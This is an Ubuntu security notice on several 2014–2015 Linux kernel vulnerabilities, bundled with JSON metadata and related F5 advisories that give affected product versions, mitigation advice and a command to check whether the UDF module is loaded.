ID USN-2542-1 Type ubuntu Reporter Ubuntu Modified 2015-03-24T00:00:00
Description
The Linux kernel's splice system call did not correctly validate its
parameters. A local, unprivileged user could exploit this flaw to cause a
denial of service (system crash). (CVE-2014-7822)
A flaw was discovered in how Thread Local Storage (TLS) is handled by the
task switching function in the Linux kernel for x86_64 based machines. A
local user could exploit this flaw to bypass the Address Space Layout
Radomization (ASLR) protection mechanism. (CVE-2014-9419)
Dmitry Chernenkov discovered a buffer overflow in eCryptfs' encrypted file
name decoding. A local unprivileged user could exploit this flaw to cause a
denial of service (system crash) or potentially gain administrative
privileges. (CVE-2014-9683)
Carl H Lunde discovered that the UDF file system (CONFIG_UDF_FS) failed to
verify symlink size info. A local attacker, who is able to mount a malicous
UDF file system image, could exploit this flaw to cause a denial of service
(system crash) or possibly cause other undesired behaviors. (CVE-2014-9728)
Carl H Lunde discovered that the UDF file system (CONFIG_UDF_FS) did not
valid inode size information . A local attacker, who is able to mount a
malicous UDF file system image, could exploit this flaw to cause a denial
of service (system crash) or possibly cause other undesired behaviors.
(CVE-2014-9729)
Carl H Lunde discovered that the UDF file system (CONFIG_UDF_FS) did not
correctly verify the component length for symlinks. A local attacker, who
is able to mount a malicous UDF file system image, could exploit this flaw
to cause a denial of service (system crash) or possibly cause other
undesired behaviors. (CVE-2014-9730)
Carl H Lunde discovered an information leak in the UDF file system
(CONFIG_UDF_FS). A local attacker, who is able to mount a malicous UDF file
system image, could exploit this flaw to read potential sensitve kernel
memory. (CVE-2014-9731)
Sun Baoliang discovered a use after free flaw in the Linux kernel's SCTP
(Stream Control Transmission Protocol) subsystem during INIT collisions. A
remote attacker could exploit this flaw to cause a denial of service
(system crash) or potentially escalate their privileges on the system.
(CVE-2015-1421)
{"id": "USN-2542-1", "bulletinFamily": "unix", "title": "Linux kernel (OMAP4) vulnerabilities", "description": "The Linux kernel's splice system call did not correctly validate its \nparameters. A local, unprivileged user could exploit this flaw to cause a \ndenial of service (system crash). (CVE-2014-7822)\n\nA flaw was discovered in how Thread Local Storage (TLS) is handled by the \ntask switching function in the Linux kernel for x86_64 based machines. A \nlocal user could exploit this flaw to bypass the Address Space Layout \nRadomization (ASLR) protection mechanism. (CVE-2014-9419)\n\nDmitry Chernenkov discovered a buffer overflow in eCryptfs' encrypted file \nname decoding. A local unprivileged user could exploit this flaw to cause a \ndenial of service (system crash) or potentially gain administrative \nprivileges. (CVE-2014-9683)\n\nCarl H Lunde discovered that the UDF file system (CONFIG_UDF_FS) failed to \nverify symlink size info. A local attacker, who is able to mount a malicous \nUDF file system image, could exploit this flaw to cause a denial of service \n(system crash) or possibly cause other undesired behaviors. (CVE-2014-9728)\n\nCarl H Lunde discovered that the UDF file system (CONFIG_UDF_FS) did not \nvalid inode size information . A local attacker, who is able to mount a \nmalicous UDF file system image, could exploit this flaw to cause a denial \nof service (system crash) or possibly cause other undesired behaviors. \n(CVE-2014-9729)\n\nCarl H Lunde discovered that the UDF file system (CONFIG_UDF_FS) did not \ncorrectly verify the component length for symlinks. A local attacker, who \nis able to mount a malicous UDF file system image, could exploit this flaw \nto cause a denial of service (system crash) or possibly cause other \nundesired behaviors. (CVE-2014-9730)\n\nCarl H Lunde discovered an information leak in the UDF file system \n(CONFIG_UDF_FS). A local attacker, who is able to mount a malicous UDF file \nsystem image, could exploit this flaw to read potential sensitve kernel \nmemory. (CVE-2014-9731)\n\nSun Baoliang discovered a use after free flaw in the Linux kernel's SCTP \n(Stream Control Transmission Protocol) subsystem during INIT collisions. A \nremote attacker could exploit this flaw to cause a denial of service \n(system crash) or potentially escalate their privileges on the system. \n(CVE-2015-1421)", "published": "2015-03-24T00:00:00", "modified": "2015-03-24T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://ubuntu.com/security/notices/USN-2542-1", "reporter": "Ubuntu", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2014-9419", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-9731", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-9683", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-1421", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-7822", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-9728", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-9730", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-9729"], "cvelist": ["CVE-2014-7822", "CVE-2014-9728", "CVE-2015-1421", "CVE-2014-9730", "CVE-2014-9729", "CVE-2014-9683", "CVE-2014-9419", "CVE-2014-9731"], "type": "ubuntu", "lastseen": "2020-07-02T11:35:55", "edition": 5, "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "f5", "idList": ["SOL17447", "SOL17237", "F5:K17447", "SOL17242", "F5:K17237", "SOL17551", "F5:K17242", "F5:K17551", "SOL16381"]}, {"type": "ubuntu", "idList": ["USN-2517-1", "USN-2543-1", "USN-2518-1", "USN-2541-1", "USN-2544-1"]}, {"type": "cve", "idList": ["CVE-2014-9730", "CVE-2014-9728", "CVE-2015-1421", "CVE-2014-9683", "CVE-2014-9731", "CVE-2014-9729", "CVE-2014-9419", "CVE-2014-7822"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220191485", "OPENVAS:1361412562310105356", "OPENVAS:1361412562310851080", "OPENVAS:1361412562310703170", "OPENVAS:1361412562310882118", "OPENVAS:1361412562310842146", "OPENVAS:1361412562310842144", "OPENVAS:1361412562310850675", "OPENVAS:1361412562310105439", "OPENVAS:703170"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-3170.NASL", "SUSE_SU-2015-1678-1.NASL", "EULEROS_SA-2019-1485.NASL", "OPENSUSE-2015-543.NASL", "SL_20150210_KERNEL_ON_SL5_X.NASL", "DEBIAN_DLA-246.NASL", "UBUNTU_USN-2541-1.NASL", "SUSE_SU-2015-1324-1.NASL", "DEBIAN_DLA-155.NASL", "SUSE_SU-2015-1611-1.NASL"]}, {"type": "suse", "idList": ["SUSE-SU-2015:1324-1", "SUSE-SU-2015:1592-1", "SUSE-SU-2015:1376-1", "SUSE-SU-2015:0832-1", "SUSE-SU-2015:1611-1", "SUSE-SU-2015:1224-1", "SUSE-SU-2015:0529-1", "OPENSUSE-SU-2015:1382-1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-246-1:C824B", "DEBIAN:DLA-155-1:5E8B0", "DEBIAN:DLA-246-2:ABC0D", "DEBIAN:DSA-3170-1:F6570"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31766", "SECURITYVULNS:VULN:14292"]}, {"type": "oraclelinux", "idList": ["ELSA-2015-0164", "ELSA-2015-0726", "ELSA-2015-3021", "ELSA-2015-0164-1"]}, {"type": "redhat", "idList": ["RHSA-2015:0751", "RHSA-2015:0727", "RHSA-2015:0164", "RHSA-2015:1082", "RHSA-2015:0726", "RHSA-2015:1030"]}, {"type": "centos", "idList": ["CESA-2015:0164", "CESA-2015:0726"]}, {"type": "exploitdb", "idList": ["EDB-ID:36743"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:93D47AC26E5DA900EF305FD8DD1D8904"]}, {"type": "amazon", "idList": ["ALAS-2015-476"]}], "modified": "2020-07-02T11:35:55", "rev": 2}, "score": {"value": 6.9, "vector": "NONE", "modified": "2020-07-02T11:35:55", "rev": 2}, "vulnersScore": 6.9}, "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "12.04", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.2.0-1461-omap4", "packageVersion": "3.2.0-1461.81"}], "scheme": null}
{"f5": [{"lastseen": "2017-10-12T02:11:21", "bulletinFamily": "software", "cvelist": ["CVE-2014-9728", "CVE-2014-9730", "CVE-2014-9729"], "edition": 1, "description": " \n\n\n * [CVE-2014-9728](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9728>) \n \nThe UDF filesystem implementation in the Linux kernel before 3.18.2 does not validate certain lengths, which allows local users to cause a denial of service (buffer over-read and system crash) via a crafted filesystem image, related to fs/udf/inode.c and fs/udf/symlink.c.\n * [CVE-2014-9729](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9729>) \n \nThe udf_read_inode function in fs/udf/inode.c in the Linux kernel before 3.18.2 does not ensure a certain data-structure size consistency, which allows local users to cause a denial of service (system crash) via a crafted UDF filesystem image. \n * [CVE-2014-9730](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9730>) \n \nThe udf_pc_to_char function in fs/udf/symlink.c in the Linux kernel before 3.18.2 relies on component lengths that are unused, which allows local users to cause a denial of service (system crash) via a crafted UDF filesystem image. \n\n\nImpact \n\n\nAn authenticated attacker must have the capability to load the vulnerable UDF kernel module and mount a crafted UDF filesystem image in order to cause a denial-of-service on the affected F5 products. By default, the vulnerable UDF kernel module is not loaded and not used by the affected F5 products.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. The Severity values and other security vulnerability parameters are defined in [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\nMitigating the vulnerability\n\nTo mitigate this vulnerability for affected F5 products, you should only permit management access to F5 products over a secure network and limit shell access to trusted users. For more information about securing access to BIG-IP/Enterprise Manager systems, refer to [SOL13309: Restricting access to the Configuration utility by source IP address (11.x - 12.x)](<https://docs.f5net.com/content/kb/en-us/solutions/public/13000/300/sol13309.html>) and [SOL13092: Overview of securing access to the BIG-IP system](<https://docs.f5net.com/content/kb/en-us/solutions/public/13000/000/sol13092.html>).\n\nDetermining vulnerability exposure on your system\n\nBy default, the vulnerable UDF kernel module is not loaded and not used by the affected F5 products. However, you can determine if your system is exposed to this vulnerability by verifying whether the UDF kernel module is loaded. To do so, perform the following procedure:\n\n**Impact of procedure**: Performing the following procedure should not have a negative impact on your system. \n\n\n 1. Log in to the command line.\n 2. Verify if the UDF kernel module is loaded by typing the following command: \n \nlsmod | grep -i udf \n \nIf the command returns no output, the UDF kernel module is not loaded on the system and the system is not exposed to this vulnerability. The UDF kernel module is loaded on the system and the system is exposed to this vulnerability if the command output appears similar to the following example: \n \nudf 66451 0 \ncrc_itu_t 1669 1 udf \n\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "modified": "2016-01-09T02:23:00", "published": "2015-10-16T21:19:00", "href": "https://support.f5.com/csp/article/K17447", "id": "F5:K17447", "type": "f5", "title": "Linux kernel UDF vulnerabilities CVE-2014-9728, CVE-2014-9729, and CVE-2014-9730", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:23:00", "bulletinFamily": "software", "cvelist": ["CVE-2014-9728", "CVE-2014-9730", "CVE-2014-9729"], "edition": 1, "description": "Recommended Action\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. The Severity values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nMitigating the vulnerability\n\nTo mitigate this vulnerability for affected F5 products, you should only permit management access to F5 products over a secure network and limit shell access to trusted users. For more information about securing access to BIG-IP/Enterprise Manager systems, refer to [SOL13309: Restricting access to the Configuration utility by source IP address (11.x - 12.x)](<https://docs.f5net.com/content/kb/en-us/solutions/public/13000/300/sol13309.html>) and [SOL13092: Overview of securing access to the BIG-IP system](<https://docs.f5net.com/content/kb/en-us/solutions/public/13000/000/sol13092.html>).\n\nDetermining vulnerability exposure on your system\n\nBy default, the vulnerable UDF kernel module is not loaded and not used by the affected F5 products. However, you can determine if your system is exposed to this vulnerability by verifying whether the UDF kernel module is loaded. To do so, perform the following procedure:\n\n**Impact of procedure**: Performing the following procedure should not have a negative impact on your system. \n\n\n 1. Log in to the command line.\n 2. Verify if the UDF kernel module is loaded by typing the following command: \n \nlsmod | grep -i udf \n \nIf the command returns no output, the UDF kernel module is not loaded on the system and the system is not exposed to this vulnerability. The UDF kernel module is loaded on the system and the system is exposed to this vulnerability if the command output appears similar to the following example: \n \nudf 66451 0 \ncrc_itu_t 1669 1 udf \n\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "modified": "2015-10-16T00:00:00", "published": "2015-10-16T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/17000/400/sol17447.html", "id": "SOL17447", "title": "SOL17447 - Linux kernel UDF vulnerabilities CVE-2014-9728, CVE-2014-9729, and CVE-2014-9730", "type": "f5", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-06-08T00:16:12", "bulletinFamily": "software", "cvelist": ["CVE-2014-9419"], "edition": 1, "description": "\nF5 Product Development has assigned ID 530413 (BIG-IP), ID 530553 (BIG-IQ), ID 530554 (Enterprise Manager), ID 520651 (FirePass), ID 461496 (ARX), and INSTALLER-1299 (Traffix) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 11.0.0 - 11.6.0* \n10.1.0 - 10.2.4* \n| 12.0.0 \n| Low | Linux kernel \n \nBIG-IP AAM | 11.4.0 - 11.6.0* \n| 12.0.0 \n| Low | Linux kernel \nBIG-IP AFM | 11.3.0 - 11.6.0* \n| 12.0.0 \n| Low | Linux kernel \nBIG-IP Analytics | 11.0.0 - 11.6.0* \n| 12.0.0 \n| Low | Linux kernel \nBIG-IP APM | 11.0.0 - 11.6.0* \n10.1.0 - 10.2.4* \n| 12.0.0 \n| Low | Linux kernel \nBIG-IP ASM | 11.0.0 - 11.6.0* \n10.1.0 - 10.2.4* \n| 12.0.0 \n| Low | Linux kernel \nBIG-IP DNS \n| None \n| 12.0.0 \n| Not vulnerable | None \nBIG-IP Edge Gateway \n| 11.0.0 - 11.3.0* \n10.1.0 - 10.2.4* \n| None \n| Low | Linux kernel \nBIG-IP GTM | 11.0.0 - 11.6.0* \n10.1.0 - 10.2.4* \n| None \n| Low | Linux kernel \nBIG-IP Link Controller | 11.0.0 - 11.6.0* \n10.1.0 - 10.2.4* \n| 12.0.0 \n| Low | Linux kernel \nBIG-IP PEM | 11.3.0 - 11.6.0* \n| 12.0.0 \n| Low | Linux kernel \nBIG-IP PSM | 11.0.0 - 11.4.1* \n10.1.0 - 10.2.4* \n| None \n| Low | Linux kernel \nBIG-IP WebAccelerator | 11.0.0 - 11.3.0* \n10.1.0 - 10.2.4* \n| None \n| Low | Linux kernel \nBIG-IP WOM | 11.0.0 - 11.3.0* \n10.1.0 - 10.2.4* \n| None \n| Low | Linux kernel \nARX | 6.0.0 - 6.4.0* \n| None \n| Low | Linux kernel \n \nEnterprise Manager | 3.0.0 - 3.1.1* \n| None | Low | Linux kernel \n \nFirePass | 7.0.0* \n6.0.0 - 6.1.0* \n| None \n| Low | Linux kernel \n \nBIG-IQ Cloud | 4.0.0 - 4.5.0* \n| None \n| Low | Linux kernel \nBIG-IQ Device | 4.2.0 - 4.5.0* \n| None \n| Low | Linux kernel \nBIG-IQ Security | 4.0.0 - 4.5.0* \n| None \n| Low | Linux kernel \nBIG-IQ ADC | 4.5.0* \n| None \n| Low | Linux kernel \nLineRate | None \n| 2.5.0 - 2.6.1 \n| Not vulnerable | None \n \nF5 WebSafe | None \n| 1.0.0 \n| Not vulnerable | None \n \nTraffix SDC | 4.0.0 - 4.4.0* \n3.3.2 - 3.5.1* \n| None \n| Low | Linux kernel \n \n* Although the software of the affected F5 products contains the vulnerable code, the affected F5 products do not use the vulnerable code in a way that exposes the vulnerability in a standard configuration. An attacker must have local shell access to the affected F5 products to trigger an exploit.\n\nIf you are running a version listed in the **Versions known to be vulnerable **column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable **column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. The Severity values and other security vulnerability parameters are defined in [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\nTo mitigate this vulnerability for affected F5 products, you should only permit management access to F5 products over a secure network and limit shell access to only trusted users. For more information about securing access to BIG-IP/Enterprise Manager systems, refer to [K13309: Restricting access to the Configuration utility by source IP address (11.x - 12.x)](<https://support.f5.com/csp/article/K13309>) and [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13902>).\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "modified": "2016-01-09T02:25:00", "published": "2015-11-06T21:25:00", "href": "https://support.f5.com/csp/article/K17551", "id": "F5:K17551", "title": "Linux kernel vulnerability CVE-2014-9419", "type": "f5", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-09-26T17:23:13", "bulletinFamily": "software", "cvelist": ["CVE-2014-9683"], "edition": 1, "description": "Recommended Action\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. The Severity values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nTo mitigate this vulnerability, you should only permit access to the ARX system over a secure network and limit login access to trusted users.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "modified": "2015-04-09T00:00:00", "published": "2015-04-09T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/16000/300/sol16381.html", "id": "SOL16381", "title": "SOL16381 - Linux kernel vulnerability CVE-2014-9683", "type": "f5", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-06-08T00:16:34", "bulletinFamily": "software", "cvelist": ["CVE-2014-7822"], "edition": 1, "description": "\nF5 Product Development has assigned ID 520174 (BIG-IP), ID 525360 (BIG-IQ), and ID 525361 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 \n| 12.0.0 \n| Low | Linux kernel \nBIG-IP AAM | 11.4.0 - 11.6.0 \n| 12.0.0 \n| Low | Linux kernel \nBIG-IP AFM | 11.3.0 - 11.6.0 \n| 12.0.0 \n| Low | Linux kernel \nBIG-IP Analytics | 11.0.0 - 11.6.0 \n| 12.0.0 \n| Low | Linux kernel \nBIG-IP APM | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 \n| 12.0.0 \n| Low | Linux kernel \nBIG-IP ASM | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 \n| 12.0.0 \n| Low | Linux kernel \nBIG-IP DNS \n| None \n| 12.0.0 \n| Not vulnerable \n| None \n \nBIG-IP Edge Gateway \n| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 \n| None \n| Low | Linux kernel \nBIG-IP GTM | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 \n| None \n| Low | Linux kernel \nBIG-IP Link Controller | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 \n| 12.0.0 \n| Low | Linux kernel \nBIG-IP PEM | 11.3.0 - 11.6.0 \n| 12.0.0 \n| Low | Linux kernel \nBIG-IP PSM | 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 \n| None \n| Low | Linux kernel \nBIG-IP WebAccelerator | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 \n| None \n| Low | Linux kernel \nBIG-IP WOM | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 \n| None \n| Low | Linux kernel \nARX | None \n| 6.0.0 - 6.4.0 \n| Not vulnerable | None \n \nEnterprise Manager | 3.0.0 - 3.1.1 \n| None \n| Low | Linux kernel \nFirePass | None \n| 7.0.0 \n6.0.0 - 6.1.0 \n| Not vulnerable | None \n \nBIG-IQ Cloud | 4.0.0 - 4.5.0 \n| None \n| Low | Linux kernel \nBIG-IQ Device | 4.2.0 - 4.5.0 \n| None \n| Low | Linux kernel \nBIG-IQ Security | 4.0.0 - 4.5.0 \n| None \n| Low | Linux kernel \nBIG-IQ ADC | 4.5.0 \n| None \n| Low | Linux kernel \nLineRate | None \n| 2.5.0 - 2.6.1 \n| Not vulnerable | None \n \nF5 WebSafe | None \n| 1.0.0 \n| Not vulnerable | None \n \nTraffix SDC | 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1 \n| None \n| Low | Linux kernel \n \n**Note**: As of February 17, 2015, AskF5 Security Advisory articles include the Severity value. Security Advisory articles published before this date do not list a Severity value.\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. The Severity values and other security vulnerability parameters are defined in [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\nTo mitigate this vulnerability for affected F5 products, you should only permit management access to F5 products over a secure network and limit shell access to trusted users. For more information, refer to [K13309: Restricting access to the Configuration utility by source IP address (11.x)](<https://support.f5.com/csp/article/K13309>) and [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13092>).\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x)](<https://support.f5.com/csp/article/K13123>)\n * [K10025: Managing BIG-IP product hotfixes (10.x)](<https://support.f5.com/csp/article/K10025>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n", "modified": "2016-01-09T02:33:00", "published": "2015-09-08T21:29:00", "href": "https://support.f5.com/csp/article/K17237", "id": "F5:K17237", "title": "Linux kernel vulnerability CVE-2014-7822", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:22:58", "bulletinFamily": "software", "cvelist": ["CVE-2014-9419"], "edition": 1, "description": "* Although the software of the affected F5 products contains the vulnerable code, the affected F5 products do not use the vulnerable code in a way that exposes the vulnerability in a standard configuration. An attacker must have local shell access to the affected F5 products to trigger an exploit.\n\nRecommended Action\n\nIf you are running a version listed in the **Versions known to be vulnerable **column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable **column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. The Severity values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nTo mitigate this vulnerability for affected F5 products, you should only permit management access to F5 products over a secure network and limit shell access to only trusted users. For more information about securing access to BIG-IP/Enterprise Manager systems, refer to SOL13309: Restricting access to the Configuration utility by source IP address (11.x - 12.x) and SOL13092: Overview of securing access to the BIG-IP system.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "modified": "2015-11-06T00:00:00", "published": "2015-11-06T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/17000/500/sol17551.html", "id": "SOL17551", "title": "SOL17551 - Linux kernel vulnerability CVE-2014-9419", "type": "f5", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-09-26T17:23:26", "bulletinFamily": "software", "cvelist": ["CVE-2014-7822"], "edition": 1, "description": "**Note**: As of February 17, 2015, AskF5 Security Advisory articles include the Severity value. Security Advisory articles published before this date do not list a Severity value.\n\nRecommended Action\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. The Severity values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nTo mitigate this vulnerability for affected F5 products, you should only permit management access to F5 products over a secure network and limit shell access to trusted users. For more information, refer to SOL13309: Restricting access to the Configuration utility by source IP address (11.x) and SOL13092: Overview of securing access to the BIG-IP system.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x)\n * SOL10025: Managing BIG-IP product hotfixes (10.x)\n * SOL9502: BIG-IP hotfix matrix\n", "modified": "2015-09-08T00:00:00", "published": "2015-09-08T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/17000/200/sol17237.html", "id": "SOL17237", "title": "SOL17237 - Linux kernel vulnerability CVE-2014-7822", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-04-16T04:21:22", "bulletinFamily": "software", "cvelist": ["CVE-2015-1421"], "description": "\nF5 Product Development has assigned ID 520183 (BIG-IP), ID 525368 (BIG-IQ), ID 525369 (Enterprise Manager), and INSTALLER-1420 (Traffix) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H17242 on the **Diagnostics** > **Identified** > **High** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| 12.0.0| Severe*| SCTP kernel module \nBIG-IP AAM| 11.4.0 - 11.6.0| 12.0.0| Severe*| SCTP kernel module \nBIG-IP AFM| 11.3.0 - 11.6.0| 12.0.0| Severe*| SCTP kernel module \nBIG-IP Analytics| 11.0.0 - 11.6.0| 12.0.0| Severe*| SCTP kernel module \nBIG-IP APM| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| 12.0.0| Severe*| SCTP kernel module \nBIG-IP ASM| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| 12.0.0| Severe*| SCTP kernel module \nBIG-IP DNS| None| 12.0.0| Not vulnerable| None \nBIG-IP Edge Gateway| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Severe*| SCTP kernel module \nBIG-IP GTM| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| None| Severe*| SCTP kernel module \nBIG-IP Link Controller| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| 12.0.0| Severe*| SCTP kernel module \nBIG-IP PEM| 11.3.0 - 11.6.0| 12.0.0| Severe*| SCTP kernel module \nBIG-IP PSM| 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| None| Severe*| SCTP kernel module \nBIG-IP WebAccelerator| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Severe*| SCTP kernel module \nBIG-IP WOM| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Severe*| SCTP kernel module \nARX| None| 6.0.0 - 6.4.0| Not vulnerable| None 